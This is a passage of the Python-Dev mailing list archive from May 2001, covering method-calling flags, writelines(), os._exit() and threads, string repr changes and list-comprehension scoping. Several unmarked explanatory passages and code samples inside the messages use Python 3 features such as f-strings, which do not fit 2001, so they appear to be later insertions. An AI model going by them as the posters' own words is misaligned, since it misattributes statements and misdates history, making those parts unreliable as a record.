that *he* had a non-zero chance of implementing his suggestion.  That makes
it far closer to reality than anything that's been suggested since <wink>.


From tim.one at home.com  Tue May 29 02:42:54 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 20:42:54 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B121814.E5E9896A@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAAKFAA.tim.one@home.com>

[MAL]
> If we end up only optimizing the re.match("O+") case, we wouldn't need
> the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
> and Martin could call the underlying API with one or more PyObject*
> taken directly from the Python VM stack.

How then does the callee know it was called with the correct # of arguments?
By adding enough pointer arguments to cover the longest possible O+ string
plus 1, then verifying that the one just beyond the last one it expects is
NULL, while the ones before that are not?  Adding another "# of arguments"
member to the method table?  Inventing METH_O, METH_OO, METH_OOO, ...?

> In that case, please consider at least supporting "O", "OO" and "OOO"
> with optional arguments treated like I suggested in an earlier
> posting (simply pass NULL and let the API take care of assigning
> a default value).
>
> This would take care of most builtins:

You don't have to convince me that cases other than plain "O" exist.  What's
missing is data in support of the idea that calls to those are relatively
frequent enough that it's a NET win to slow plain "O" in order to speed the
additional cases when they happen.  For example, it's not possible for calls
to reduce() to have a high hit rate in real life, because builtin_reduce is
a very expensive function -- there's only so many of those you can cram into
a second even if the calling overhead is 0.  OTOH, add a single branch to
the time it takes to find builtin_type and you've slowed its *total*
execution time significantly.

The implementation of METH_O alone is a pure win by any measure.  So would
be implementing METH_OO alone, or METH_OOO alone, etc.  Mix them, and they
all get slower than they could have been.  All the data we have says METH_O
is the single most important case, and that jibes with common sense, so I
believe it.

If you want to speed everything, fine, do that, but that likely requires a
preprocessing phase so that type signatures don't have to be resolved at
runtime at all.  So long as we're just looking at simple hacks, "the simpler
the better" is good advice and should rule in the absence of compelling
evidence against it.
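To make the trade-off concrete, here is a toy Python model of a caller dispatching on a method's flag. It is not CPython's actual C code; the flag values and the call_builtin() helper are illustrative assumptions. It sketches one answer to the "how does the callee know" question: with a single METH_O flag, the caller checks for exactly one argument in one place, and every additional flag adds another comparison to the dispatch.

```python
# Illustrative flag values (CPython defines METH_VARARGS and METH_O in its C headers).
METH_VARARGS = 0x0001
METH_O = 0x0008


def call_builtin(func, flags, args):
    """Toy model of how an interpreter might call a builtin based on its flag."""
    if flags == METH_O:
        # Fast path: the caller guarantees exactly one object and passes it
        # straight through, so no argument tuple is built or parsed.
        if len(args) != 1:
            raise TypeError(
                f"{func.__name__}() takes exactly one argument ({len(args)} given)"
            )
        return func(args[0])
    if flags == METH_VARARGS:
        # General path: the callee receives a tuple and must unpack it itself.
        return func(tuple(args))
    raise ValueError(f"unknown flag {flags!r}")
```

Adding METH_OO, METH_OOO, ... to this model means more comparisons in the dispatch, which is the cost Tim objects to whenever it lands on the path to the common METH_O case.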


From tim.one at home.com  Tue May 29 03:14:16 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 21:14:16 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEABKFAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> Because it is a METH_OLDARGS method, you can do
>
> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")
>
> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Guido won't, and if he had even a twinge of doubt, Thomas's explanation of
how this bug was introduced in 2.0 would erase it.  The list.append() docs
were arguably unclear when that brouhaha hit, but there's nothing unclear
about the file.writelines() docs.

OTOH, the file.writelines() docs still say a list is required, not "a
sequence" as the 2.0 (+ current) code actually implements.

Hmm.  Wonder whether writelines() should be generalized to allow an iterable
object?
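For comparison, in present-day Python (not the 2.1 code under discussion) writelines() takes exactly one argument, and that argument may be any iterable of strings, which is the generalization wondered about above. A small sketch using io.StringIO so it runs without touching the filesystem; demo_writelines() is just an illustrative name:

```python
import io


def demo_writelines():
    buf = io.StringIO()
    # A list of strings, as the file.writelines() docs describe.
    buf.writelines(["foo\n", "bar\n"])
    # Any iterable of strings works too, e.g. a generator expression.
    buf.writelines(line.upper() for line in ["baz\n"])
    return buf.getvalue()
```

Calling writelines("foo\n", "bar\n") with two arguments raises TypeError there, which matches the semantics Martin proposes.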


From tim.one at home.com  Tue May 29 03:49:29 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 21:49:29 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>

[Aahz]
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

[Tim]
> Please open a bug report on that, then, with a tiny test case
> if possible.
> This worked fine on Win98SE for me just now:

[Aahz]
> Futz.  *Now* it works.  <sigh>

Now *what* works?  The test case I posted, or the original test case you
tried (which you didn't post)?

> Chalk it up to another unreproducible bug caused by an unstable Win98.

Actually, I doubt it -- threads are very reliable on Win98, even though little
else is (malloc() is flaky, popen() is a nightmare, etc.).

Here's a recent bug report on a Red Hot box that may be related:

http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735

I have no idea what's supposed to happen if you call os._exit from a
*spawned* thread (perhaps that's what you did too?  I did not) -- threads
are outside the scope of the C std, so I suppose it's a x-platform
crapshoot.


From greg at cosc.canterbury.ac.nz  Tue May 29 04:12:55 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:12:55 +1200 (NZST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin at loewis.home.cs.tu-berlin.de>

> I took a special look at METH_OLDARGS occurrences.

Shouldn't all these be removed? I would have thought
list.append was the last one!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Tue May 29 04:33:58 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:33:58 +1200 (NZST)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz>

Samuele Pedroni writes:
> I imagine a (new) function that produce a snap-shot of the values in the
> local,free and cell vars of a scope can do the job required for simple 
> debugging

I think there should be methods operating directly
on stack frames for debuggers to use.
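Present-day CPython already lets debuggers reach frames directly. A minimal sketch of the "snapshot" Samuele describes, built on sys._getframe() (CPython-specific, as the underscore warns) and frame.f_locals, which for a function frame also includes the function's cell and free variables. The function name is hypothetical:

```python
import sys


def snapshot_caller_vars():
    """Return a plain-dict copy of the caller's local, cell and free variables."""
    frame = sys._getframe(1)     # the frame of whoever called us
    return dict(frame.f_locals)  # a copy, so later rebindings don't show up in it
```

Because the result is a copy, a debugger can inspect it freely without any risk of writing back into the running frame.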



From jepler at mail.inetnebr.com  Tue May 29 04:32:05 2001
From: jepler at mail.inetnebr.com (Jeff Epler)
Date: Mon, 28 May 2001 21:32:05 -0500
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400
References: <20010524045938.5228199C83@waltz.rahul.net> <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>
Message-ID: <20010528213205.A1236@localhost.localdomain>

On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote:
> Here's a recent bug report on a Red Hot box that may be related:
> 
> http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
> 
> I have no idea what's supposed to happen if you call os._exit from a
> *spawned* thread (perhaps that's what you did too?  I did not) -- threads
> are outside the scope of the C std, so I suppose it's a x-platform
> crapshoot.

I wrote that program after the first go-round about _exit and threads,
and when I got behavior I didn't expect, I entered it in the SF bug
tracker.

My reasoning: The documentation for _exit() says it is "used to exit the
child process after a fork()", and my model for thinking about threads
is that they're "child processes, but ...".  Thus, invoking os._exit()
in a thread made sense to me, meaning "ask the OS to destroy this thread
now, but leave my file descriptors, etc., alone for the other threads."

Your suggestion in the tracker of writing the equivalent C program is a
good one, though my suspicion (which I did not voice in the SF report)
was that perhaps the thread which called _exit() held the GIL, in which
case it was in some sense Python's fault that execution didn't continue.
In any case, I don't have the faintest idea how to program threads in
C/pthreads, so I can't write the "equivalent C program".

In fact, a traceback from the hung "sleep(1)" thread shows

(gdb) where
#0  0x4008c656 in __sigsuspend (set=0xbffff5b0) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0) at pthread.c:934
#2  0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8) at restart.h:34
#3  0x08067ba0 in PyThread_acquire_lock () at eval.c:41
#4  0x08051ff1 in PyEval_RestoreThread () at eval.c:41
#5  0x40019ef9 in floatsleep () at eval.c:41
#6  0x400193fd in time_sleep () at eval.c:41
[...]

While those line numbers look a little fishy (eval.c:41 for all three
frames?), I think this might support my supposition.

Of course, if os._exit() has no intended use in a threaded program, then
this behavior is as good as any.  <wink>

Jeff


From tim.one at home.com  Tue May 29 06:03:38 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 00:03:38 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010528213205.A1236@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKFAA.tim.one@home.com>

[Jeff Epler, on
 http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
]
> My reasoning: The documentation for _exit() says it is "used to exit the
> child process after a fork()", and my model for thinking about threads
> is that they're "child processes, but ...".  Thus, invoking os._exit()
> in a thread made sense to me, meaning "ask the OS to destroy this thread
> now, but leave my file descriptors, etc., alone for the other threads."

You need a Linux expert to address this.  Threads and processes are
different beasts under most flavors of Unix, but Linux confuses them; I've
no idea how _exit() is supposed to work there, and that's why I asked (in
the bug report) what the Linux docs say about that (_exit() is supplied by
your local C library; Python just wraps it).

If what you really wanted was just to abort the thread, use thread.exit()
(see the thread docs).  os._exit() is a dangerous thing even in the best of
conditions; unsure why the Python docs suggest using it.
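A minimal sketch of the thread.exit() route, written for present-day Python, where the low-level thread module is named _thread. _thread.exit() raises SystemExit in the calling thread only, and threading silently ignores an uncaught SystemExit in a worker, so the main thread carries on. The run_demo() name is just for illustration:

```python
import _thread
import threading


def run_demo():
    events = []

    def worker():
        events.append("started")
        _thread.exit()  # raises SystemExit in this thread only
        events.append("never reached")

    t = threading.Thread(target=worker)
    t.start()
    t.join()  # the worker has ended; the process and the main thread have not
    events.append("main thread still running")
    return events
```

Calling os._exit() inside worker() instead would skip all cleanup and, at least on Windows, take down every thread in the process.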

> Your suggestion in the tracker of writing the equivalent C program is a
> good one, though my suspicion (which I did not voice in the SF report)
> was that perhaps the thread which called _exit() held the GIL, in which
> case it was in some sense Python's fault that execution didn't continue.

Ah, makes sense!  Yes, I bet that's what's happening.  If so, there's
nothing Python can do about it:  I'm afraid you did it to yourself.  _exit()
specifically asks that no cleanup processing be done, and when Python calls
it Python never regains control.  If you had done an actual fork, fine, the
*process* doing the _exit() would never come back to Python, but the GIL in
that process has nothing to do with the GIL in the parent process.  But
threads share the same GIL, and if you _exit() from a thread holding the GIL
then no other thread can ever run again.

Looks like it's also platform-dependent:  on Windows, _exit() kills the
process and every thread ever spawned by that process.  Since C doesn't say
anything about threads, that can't be called right or wrong.  Looks like on
Linux _exit() only kills the thread that calls it.

> ...
> Of course, if os._exit() has no intended use in a threaded program,

Right, it wasn't -- unless your program panics and wants to get out ASAP no
matter what the consequences.

> then this behavior is as good as any.  <wink>

And better than most <heh>.


From tim.one at home.com  Tue May 29 06:16:46 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 00:16:46 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>

[Martin]
> I took a special look at METH_OLDARGS occurrences.

[GregE]
> Shouldn't all these be removed? I would have thought
> list.append was the last one!

I count 42 of them remaining, usually for 0-argument functions.
METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can
distinguish between "called with nothing" and "called with something" under
OLDARGS.  However, they don't appear to catch keyword args:

>>> {}.clear(2)  # complains
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes no arguments
>>> {}.clear(val=12, hohoho=666)  # accepts nonsense silently
>>>

the-more-you-look-the-messier-it-gets-ly y'rs  - tim


From tim.one at home.com  Tue May 29 08:06:19 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 02:06:19 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEAMKFAA.tim.one@home.com>

ESR> Apparently the Universe is an even more random place than I
ESR> thought.

[Barry A. Warsaw]
> here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,

That's what Einstein believed (i.e., that it isn't truly random).
Unfortunately, according to another recent thread, Einstein was afraid to
use equations because he didn't want to cut Stephen Hawking's editor's penis
in half -- or something like that.  Whichever, consensus still holds that
Einstein lost this one.

i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace-
    crying-for-help-ly y'rs  - tim


From tim.one at home.com  Tue May 29 08:15:07 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 02:15:07 -0400
Subject: [Python-Dev] RE: What happened to Idle's extend.py?
In-Reply-To: <f9b3eae9.0105231419.7d093237@posting.google.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEANKFAA.tim.one@home.com>

Guido's on vacation.  Anyone have an answer for this?  I don't, and can't
make time to dig into it now.

If you can, David's address showed up as mailto:boogiemorg at aol.com

> -----Original Message-----
> From: python-list-admin at python.org
> [mailto:python-list-admin at python.org]On Behalf Of David Morgenthaler
> Sent: Wednesday, May 23, 2001 6:20 PM
> To: python-list at python.org
> Subject: What happened to Idle's extend.py?
>
>
> Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was
> used to extend Idle. We've used this extensively, building entire
> "applications" as Idle extensions.
>
> Now that we're moving to Python 2.1, we find the same old directions
> for extending Idle (in extend.txt), but there appears to be no
> extend.py in Idle-0.8.
>
> Does anyone know how we can add extensions to Idle-0.8?
>
> Thanks in advance,
> David
> --
> http://mail.python.org/mailman/listinfo/python-list


From mwh at python.net  Tue May 29 10:00:42 2001
From: mwh at python.net (Michael Hudson)
Date: Tue, 29 May 2001 09:00:42 +0100 (BST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>
Message-ID: <Pine.SOL.4.33.0105290854520.24723-100000@yellow.csi.cam.ac.uk>

On Tue, 29 May 2001, Tim Peters wrote:

> [Martin]
> > I took a special look at METH_OLDARGS occurrences.
>
> [GregE]
> > Shouldn't all these be removed? I would have thought
> > list.append was the last one!
>
> I count 42 of them remaining, usually for 0-argument functions.

There are more than that; PyMethodDefs that don't put anything in that
slot in the source are METH_OLDARGS too, and there are quite a few of them
in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the
older modules - gl, rotor were easy to find).  There are also quite a lot
of functions that put literal zeros there, too.

So METH_OLDARGS is far from dead, sadly.

Cheers,
M.


From tim.one at home.com  Tue May 29 10:04:48 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 04:04:48 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBBKFAA.tim.one@home.com>

[from Monday, May 21, 2001 1:04 PM]

[Tim]
>> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

[Martin v. Loewis]
> Any reason why PyThreadState_GET isn't used there?

Perhaps somebody's shift key got jammed?

sure-don't-see-a-good-reason-ly y'rs  - tim


From thomas at xs4all.net  Tue May 29 11:52:01 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 29 May 2001 11:52:01 +0200
Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
Message-ID: <20010529115201.J676@xs4all.nl>

Robin apparently ran into a real problem caused by the change in string
repr() semantics. Now, arguably this is his own stupid fault <wink> (and
indeed he argues that himself) but that doesn't mean we shouldn't take this
into account. We could, for instance, revert 2.1.1 to the old behaviour,
giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide
what the string repr() change really wanted was just for the REPL to print
it like this, in which case the displayhook should fix it, not string_repr.

Opinions ? Ping, IIRC, this was your proposal, so yours would be especially
valuable ;)
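If the goal is only to keep feeding octal-only tools, one option that needs no change to Python is for the caller to produce old-style escapes itself. A rough sketch; the function name is hypothetical, and it only approximates the pre-2.1 output (it always uses single quotes and assumes every character is below 256):

```python
def octal_repr(s):
    """Render s as a quoted literal using octal escapes for unprintable characters."""
    out = ["'"]
    for ch in s:
        code = ord(ch)
        if ch in ("\\", "'"):
            out.append("\\" + ch)        # escape backslash and the quote character
        elif 32 <= code < 127:
            out.append(ch)               # printable ASCII passes through unchanged
        else:
            out.append("\\%03o" % code)  # always three octal digits, e.g. \012
    out.append("'")
    return "".join(out)
```

Always emitting three digits keeps the output unambiguous even when a digit follows the escape. A wrapper around this could also be installed as sys.displayhook if only the interactive display matters.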

----- Forwarded message from Robin Becker <robin at jessikat.fsnet.co.uk> -----

Date: Tue, 29 May 2001 09:58:49 +0100
From: Robin Becker <robin at jessikat.fsnet.co.uk>
To: Thomas Wouters <thomas at xs4all.net>
Cc: python-list at python.org
Subject: Re: string repr in 2.1

In message <20010529102414.P690 at xs4all.nl>, Thomas Wouters
<thomas at xs4all.net> writes
>On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote:
>> In article <slrn9h5m4o.1hk.scarblac at pino.selwerd.nl>, Remco Gerlich
>> <scarblac at pino.selwerd.nl> writes
>
>> >Since 2.1, string repr uses hexadecimal escapes instead of octal ones.
>
>> yes I guess all those *nix tools that like octal should be whipped and
>> made to obey the malevolent dictator.
>
>Do you have tools you use to parse quoted (repr'd) Python strings that
>handle octal correctly, but don't handle \x and \n\r escape codes ? Which
>ones ? And were you aware that they were going to break sooner or later,
>just because someone can prefer 'readable' escape codes and feed it that
>instead ? :)
>
Yes, I have such tools. One is called Acrobat Reader, another is
traditional sed and awk. My DOS grep doesn't seem to like hex; I suppose
I must update it and all other tools.
 
My C compiler understands octal and the newer ones do hex as well.

I can probably read octal and do arithmetic in it more easily than hex. I
don't defend the octal representation; it's just very widespread in the
older tools. Our usage of repr was probably stupid, as clearly repr can
change.

How I long for my 18-bit PDP-15 :) What happened to my 15 octal digit
CDC! Oh woe is me! Where are the duodecimal calculators of yore?
-- 
Robin Becker


----- End forwarded message -----

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From akuchlin at mems-exchange.org  Tue May 29 16:04:37 2001
From: akuchlin at mems-exchange.org (Andrew Kuchling)
Date: Tue, 29 May 2001 10:04:37 -0400
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us> <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>
Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us>

On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote:
>  It looks like I never replied to this.  It's probably dropped off
>your radar, but I'd say the answer is that the files on parrot should
>be discarded sooner rather than later -- when we actually manage to

Done.  Out of paranoia about doing 'rm -rf' within www.python.org's
tree, the files aren't deleted; instead I just moved them to my home
directory on parrot.

--amk


From aahz at rahul.net  Tue May 29 17:47:13 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Tue, 29 May 2001 08:47:13 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com> from "Tim Peters" at May 28, 2001 09:49:29 PM
Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> [Aahz]
> > Futz.  *Now* it works.  <sigh>
> 
> Now *what* works?  The test case I posted, or the original test case you
> tried (which you didn't post)?

My original test case.  I didn't actually preserve it, so the code below
was my attempt to reconstruct it (but I think it's pretty close to the
test case I tried).  Don't worry, if I run into this again, I'll be
*much* more careful about preserving the evidence and fiddling with
variations; last time I just assumed it was pilot error.

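from threading import Thread
import os

class Foo(Thread):
    def run(self):
        # spin forever so the worker is still alive when we exit
        while 1:
            pass

f = Foo()
f.start()
# hard-exit the process while the worker thread is still running
os._exit(1)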


From beazley at cs.uchicago.edu  Tue May 29 18:56:09 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Tue, 29 May 2001 11:56:09 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>

I'm not sure if this has ever been brought up before (I don't recall
seeing it), but I would like to throw out something that has been
bugging me about list comprehensions for quite some time...

First of all, I have to say that I've really grown to like list
comprehensions a lot.  In fact, I find myself using them in just about
every Python program I've been writing since switching to Python 2.0.
However, I've also been shooting myself in the foot a little more than
usual due to the following issue:

When I write a list comprehension like this:

    s = [ expr(x) for x in t ]

it is *VERY* easy to overlook the fact that the iteration variable "x"
is bound in the local scope (and replaces any previous binding
to "x" that might have existed outside the context of the list
comprehension).  Because of this, I have frequently found myself
debugging the following programming error:

   # Some loop
   for x in r:
       ...
       # bunch of statements
       ...
       s = [expr(x) for x in t]
       ...
       # Try to do something with x.
       # ???? What in the hell is wrong with my program ????
       ...

The main problem is that I conceptually tend to think of the list
comprehension as being some kind of list operator where the index name
is really one of the operands in some sense.  Because of this, it is
*VERY* easy to get in the habit of throwing list comprehensions all
over the place, each of which uses a common index name like x,i,j,
etc.  Of course, this works just fine until you forget that you're
also using x,i,j for some kind of loop variable someplace else :-).

Therefore, I'm wondering if it would make any sense to make the
iterator variables used inside of a list comprehension private in some
manner--either through name mangling or some other technique? For
example:

   s = [expr(x) for x in t]

would get expanded into something roughly like this:

   s = [ ]
   for _mangled_x in t:
       s.append(expr(_mangled_x))
   del _mangled_x
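A runnable variant of the expansion above, as a sketch: putting the loop inside a helper function keeps the loop variable out of the caller's namespace entirely, and also avoids the NameError that del _mangled_x would raise when t is empty. The comprehend() name is hypothetical. The last comprehension in demo() shows, for comparison, that in Python 3 a list comprehension's variable no longer leaks into the enclosing scope.

```python
def comprehend(expr, iterable):
    """Hypothetical helper mirroring the proposed expansion of [expr(x) for x in t]."""
    result = []
    for item in iterable:  # 'item' lives only in this function's frame
        result.append(expr(item))
    return result          # no 'del' needed, so an empty iterable is fine


def demo():
    x = "outer loop value"
    squares = comprehend(lambda v: v * v, [1, 2, 3])
    doubled = [x * 2 for x in [10, 20]]  # in Python 3 this x does not leak
    return x, squares, doubled
```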

Just as an aside, I have never intentionally used the iterator
variable of a list comprehension after the operation has completed. I
was actually quite surprised with this behavior the first time I saw
it.  I suspect most other programmers would not anticipate this side
effect either.

Comments?

Cheers,

Dave


From nas at python.ca  Tue May 29 19:01:41 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 29 May 2001 10:01:41 -0700
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529100141.B18974@glacier.fnational.com>

David Beazley wrote:
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

I've been bitten by this one once.  It took a while to figure out
the problem.  I'm not sure that we can change it now though.

  Neil


From skip at pobox.com  Tue May 29 21:03:47 2001
From: skip at pobox.com (Skip Montanaro)
Date: Tue, 29 May 2001 14:03:47 -0500
Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd)
Message-ID: <15123.62099.473259.545781@beluga.mojam.com>


I pass this along in case anyone here has some ideas for Jeff about how to
workaround his problems with pyexpat.c.

Skip

-------------- next part --------------
An embedded message was scrubbed...
From: Jeff Rush <jrush at taupro.com>
Subject: [Stackless] Stackless for 2.1: Progress Report
Date: Tue, 29 May 2001 13:06:12 -0500
Size: 3437
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010529/6d6875ae/attachment.eml>

From gward at python.net  Tue May 29 23:21:55 2001
From: gward at python.net (Greg Ward)
Date: Tue, 29 May 2001 17:21:55 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529172155.A8737@gerg.ca>

On 29 May 2001, David Beazley said:
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner--either through name mangling or some other technique? For
> example:

Two ideas occur to me:
  * make the list comprehension a new scoping level, which of course
    is doable now that we have sensible scoping semantics.  Presumably
    the usual warning message about shadowing variables from an
    outer scope will apply; you'll still have the bug in your code,
    but at least Python will tell you about it

  * don't make list comprehensions a separate scope, but add a
    little trickery so that something *like* the "shadowing variable
    from an outer scope" message is emitted

Haven't really thought about backwards compatibility issues...

        Greg


From paulp at ActiveState.com  Tue May 29 23:55:03 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Tue, 29 May 2001 14:55:03 -0700
Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
References: <20010529115201.J676@xs4all.nl>
Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com>

Thomas Wouters wrote:
> 
> Robin apparently ran into a real problem caused by the change in string
> repr() semantics. Now, arguably this is his own stupid fault <wink> (and
> indeed he argues that himself) but that doesn't mean we shouldn't take this
> into account. 

I think it is done now and it is better this way. The pain is over.
Reverting would hurt someone else again.

Displayhook should be used sparingly. One of the major virtues of the
REPL is that it behaves so much like standard Python.

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From tim at digicool.com  Wed May 30 00:54:01 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 29 May 2001 18:54:01 -0400
Subject: [Python-Dev] Re: Time for the yearly list.append() panic
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEKACAAA.tim@digicool.com>

FYI, I checked in a variation (listobject.c) over the weekend.

Win9x is ultimately hopeless, but we can grow a list there to about 35M
elements now instead of crapping out at < 2M, and it's zippy the whole way
until death.

Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was
obvious very early there.  Now it's flat and fast until physical RAM is
exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize
points.

Fred kindly confirmed that Linux isn't hurt.  Its behavior looks the same as
the new Win2K behavior, except that the Linux hiccups are much briefer
(although still obvious when they occur).
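The exact growth rule checked into listobject.c isn't spelled out here, so the following is only a hypothetical model of why over-allocating in proportion to the list's size avoids quadratic behavior while growing by a fixed step does not. Neither policy below is claimed to be what listobject.c actually does; both growth functions are illustrative assumptions.

```python
def count_copies(n, grow):
    """Simulate appending n items; return (number of resizes, elements copied).

    grow(needed) returns the new capacity to allocate when the buffer is full.
    """
    capacity = 0
    resizes = 0
    copied = 0
    for size in range(n):       # 'size' = number of items already stored
        if size == capacity:    # buffer full: allocate a bigger one and copy
            capacity = grow(size + 1)
            resizes += 1
            copied += size
    return resizes, copied


def fixed_increment(needed, step=100):
    # Hypothetical policy: round up to the next multiple of 'step'.
    return ((needed + step - 1) // step) * step


def proportional(needed):
    # Hypothetical policy: over-allocate by about 1/8 plus a small constant.
    return needed + (needed >> 3) + (3 if needed < 9 else 6)
```

For 100,000 appends the fixed-step policy copies about 50 million elements, while the proportional one copies fewer than a million: total copying stays linear in the list length, and only the occasional resize (the "hiccup") is expensive.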

time-for-the-yearly-list.append()-celebration-ly y'rs  - tim


From neal at metaslash.com  Wed May 30 04:49:45 2001
From: neal at metaslash.com (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <3B145FC9.49813488@metaslash.com>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
Variable unused warnings.

Code that makes PyChecker raise an exception should now be caught in most
cases and this produces a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

